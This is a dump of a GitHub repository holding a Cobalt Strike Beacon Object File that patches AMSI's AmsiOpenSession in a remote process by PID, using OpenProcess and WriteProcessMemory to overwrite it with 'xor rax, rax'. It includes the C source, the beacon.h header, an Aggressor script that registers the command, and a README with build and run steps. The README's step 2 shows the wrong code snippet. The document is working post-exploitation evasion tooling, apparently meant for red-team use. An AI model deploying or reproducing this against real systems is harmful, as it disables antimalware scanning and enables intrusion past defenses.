├── LICENSE.md ├── README.md ├── beacon.h ├── images ├── After-AmsiOpenSession.png ├── Before-Amsi-OpenSession.png └── runningBof.png ├── inject-amsiBypass.c └── inject-amsiBypass.cna /LICENSE.md: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2023 Bobby Cooke 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Cobalt Strike BOF - Inject AMSI Bypass 2 | Cobalt Strike Beacon Object File (BOF) that bypasses AMSI in a remote process with code injection. 3 | 4 | #### Running inject-amsiBypass BOF from CobaltStrike 5 | ![](images/runningBof.png) 6 | 7 | ### What does this do? 8 | ##### 1. Use supplied PID argument to get a handle on the remote process 9 | ```c 10 | hProc = KERNEL32$OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, (DWORD)pid); 11 | ``` 12 | ##### 2. Load AMSI.DLL into beacons memory and get the address of AMSI.AmsiOpenSession 13 | ```c 14 | hProc = KERNEL32$OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, (DWORD)pid); 15 | ``` 16 | + Both beacon and the target process will both have the same address for the symbol. 17 | + If AMSI.DLL does not exist in the remote process, running this may crash the target process. 18 | ##### 3. Write the AMSI bypass to the remote processes memory 19 | ```c 20 | unsigned char amsibypass[] = { 0x48, 0x31, 0xC0 }; // xor rax, rax 21 | BOOL success = KERNEL32$WriteProcessMemory(hProc, amsiOpenSessAddr, (PVOID)amsibypass, sizeof(amsibypass), &bytesWritten); 22 | ``` 23 | 24 | ### Method = AMSI.AmsiOpenSession 25 | + Uses the AMSI bypass technique taught in Offensive Security's PEN-300/OSEP (Evasion Techniques and Breaching Defenses) course. 26 | - https://www.offensive-security.com/pen300-osep/ 27 | 28 | ### Proof of Concept Demo Screenshots 29 | #### Before - Powershell.exe AMSI.AmsiOpenSession 30 | ![](images/Before-Amsi-OpenSession.png) 31 | 32 | #### After - Powershell.exe AMSI.AmsiOpenSession 33 | ![](images/After-AmsiOpenSession.png) 34 | 35 | ### Compile with x64 MinGW: 36 | ```bash 37 | x86_64-w64-mingw32-gcc -c inject-amsiBypass.c -o inject-amsiBypass.o 38 | ``` 39 | ### Run from Cobalt Strike Beacon Console 40 | ```bash 41 | beacon> inject-amsiBypass 42 | ``` 43 | + Make sure to load the inject-amsiBypass.cna script into Cobalt Strikes Script Manager 44 | 45 | ### To Do List 46 | + Check that AMSI.DLL exists in remote process before injection 47 | + Add other AMSI bypasses to inject 48 | + Support x86 49 | 50 | ### Credits / References 51 | ##### Raphael Mudge - Beacon Object Files - Luser Demo 52 | + https://www.youtube.com/watch?v=gfYswA_Ronw 53 | ##### Cobalt Strike - Beacon Object Files 54 | + https://www.cobaltstrike.com/help-beacon-object-files 55 | ##### BOF Code References 56 | ###### ajpc500/BOFs 57 | + https://github.com/ajpc500/BOFs/ 58 | ###### trustedsec/CS-Situational-Awareness-BOF 59 | + https://github.com/trustedsec/CS-Situational-Awareness-BOF 60 | ##### Sektor7 Malware Dev Essentials course 61 | + https://institute.sektor7.net/red-team-operator-malware-development-essentials 62 | ##### Offensive Security OSEP 63 | + https://www.offensive-security.com/pen300-osep/ 64 | -------------------------------------------------------------------------------- /beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Cobalt Strike 4.1. 8 | */ 9 | 10 | /* data API */ 11 | typedef struct { 12 | char * original; /* the original buffer [so we can free it] */ 13 | char * buffer; /* current pointer into our buffer */ 14 | int length; /* remaining length of data */ 15 | int size; /* total size of this buffer */ 16 | } datap; 17 | 18 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 19 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 20 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 21 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 22 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 23 | 24 | /* format API */ 25 | typedef struct { 26 | char * original; /* the original buffer [so we can free it] */ 27 | char * buffer; /* current pointer into our buffer */ 28 | int length; /* remaining length of data */ 29 | int size; /* total size of this buffer */ 30 | } formatp; 31 | 32 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 33 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 34 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 35 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 36 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 37 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 38 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 39 | 40 | /* Output Functions */ 41 | #define CALLBACK_OUTPUT 0x0 42 | #define CALLBACK_OUTPUT_OEM 0x1e 43 | #define CALLBACK_ERROR 0x0d 44 | #define CALLBACK_OUTPUT_UTF8 0x20 45 | 46 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 47 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 48 | 49 | /* Token Functions */ 50 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 51 | DECLSPEC_IMPORT void BeaconRevertToken(); 52 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 53 | 54 | /* Spawn+Inject Functions */ 55 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 56 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 57 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 58 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 59 | DECLSPEC_IMPORT BOOL BeaconSpawnTemporaryProcess (BOOL x86, BOOL ignoreToken, STARTUPINFO * sInfo, PROCESS_INFORMATION * pInfo); 60 | 61 | /* Utility Functions */ 62 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); -------------------------------------------------------------------------------- /images/After-AmsiOpenSession.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/boku7/injectAmsiBypass/34f4eaa7ecd2e98b9d21f1758d1465db0fe6a455/images/After-AmsiOpenSession.png -------------------------------------------------------------------------------- /images/Before-Amsi-OpenSession.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/boku7/injectAmsiBypass/34f4eaa7ecd2e98b9d21f1758d1465db0fe6a455/images/Before-Amsi-OpenSession.png -------------------------------------------------------------------------------- /images/runningBof.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/boku7/injectAmsiBypass/34f4eaa7ecd2e98b9d21f1758d1465db0fe6a455/images/runningBof.png -------------------------------------------------------------------------------- /inject-amsiBypass.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include "beacon.h" 3 | 4 | // Author: Bobby Cooke (@0xBoku) // SpiderLabs // github.com/boku7 // https://www.linkedin.com/in/bobby-cooke/ // https://0xboku.com 5 | 6 | WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD dwDesiredAccess, WINBOOL bInheritHandle, DWORD dwProcessId); 7 | WINBASEAPI FARPROC WINAPI KERNEL32$GetProcAddress(HMODULE hModule, LPCSTR lpProcName); 8 | WINBASEAPI WINBOOL WINAPI KERNEL32$WriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten); 9 | WINBASEAPI HMODULE WINAPI KERNEL32$LoadLibraryA(LPCSTR lpLibFileName); 10 | WINBASEAPI WINBOOL WINAPI KERNEL32$CloseHandle(HANDLE hObject); 11 | 12 | void patchAmsiOpenSession(int pid) { 13 | HANDLE hProc = NULL; 14 | SIZE_T bytesWritten; 15 | // https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess 16 | // HANDLE OpenProcess( 17 | // DWORD dwDesiredAccess, - The access to the process object. 18 | // BOOL bInheritHandle, - If this value is TRUE, processes created by this process will inherit the handle. 19 | // DWORD dwProcessId - The identifier of the local process to be opened. 20 | // ); 21 | // https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights 22 | // PROCESS_VM_OPERATION (0x0008) Required to perform an operation on the address space of a process 23 | // PROCESS_VM_WRITE (0x0020) Required to write to memory in a process using WriteProcessMemory. 24 | // Takes the PID supplied and opens a handle to that process 25 | hProc = KERNEL32$OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, (DWORD)pid); 26 | // Loads AMSI.DLL into the beacons memory and resolves the address of the AmsiOpenSession symbol 27 | // The addresses of the symbols for DLLs are the same across all processes 28 | PVOID amsiOpenSessAddr = KERNEL32$GetProcAddress(KERNEL32$LoadLibraryA("amsi.dll"), "AmsiOpenSession"); 29 | // This is the payload we will inject into the start of the AmsiOpenSession symbol within the target process 30 | unsigned char amsibypass[] = { 0x48, 0x31, 0xC0 }; // xor rax, rax 31 | // Write the AMSI bypass payload to the remote process 32 | BOOL success = KERNEL32$WriteProcessMemory(hProc, amsiOpenSessAddr, (PVOID)amsibypass, sizeof(amsibypass), &bytesWritten); 33 | KERNEL32$CloseHandle(hProc); 34 | if (success) { 35 | BeaconPrintf(CALLBACK_OUTPUT, "Success - Patched AMSI.AmsiOpenSession in remote process: PID:%d",pid); 36 | } 37 | else { 38 | BeaconPrintf(CALLBACK_OUTPUT, "Fail - Could not patch AMSI.AmsiOpenSession in remote process: PID:%d", pid); 39 | } 40 | } 41 | void go(char * args, int len) { 42 | datap parser; 43 | DWORD pid; 44 | BeaconDataParse(&parser, args, len); 45 | pid = BeaconDataInt(&parser); 46 | BeaconPrintf(CALLBACK_OUTPUT, "Attempting to patch AMSI in remote process with PID: %d", pid); 47 | patchAmsiOpenSession(pid); 48 | } 49 | -------------------------------------------------------------------------------- /inject-amsiBypass.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register( 2 | "inject-amsiBypass", 3 | "Bypass AMSI in a remote process with code injection.", 4 | "Synopsis: inject-amsiBypass PID" 5 | ); 6 | 7 | alias inject-amsiBypass { 8 | if(size(@_) != 2) 9 | { 10 | berror($1, "Incorrect usage!"); 11 | berror($1, beacon_command_detail("inject-amsiBypass")); 12 | return; 13 | } 14 | local('$handle $data $args'); 15 | $handle = openf(script_resource("inject-amsiBypass.o")); 16 | $data = readb($handle, -1); 17 | closef($handle); 18 | $args = bof_pack($1, "i",$2); 19 | btask($1, "Inject AMSI Bypass (@0xBoku|github.com/boku7)"); 20 | beacon_inline_execute($1, $data, "go", $args); 21 | } 22 | --------------------------------------------------------------------------------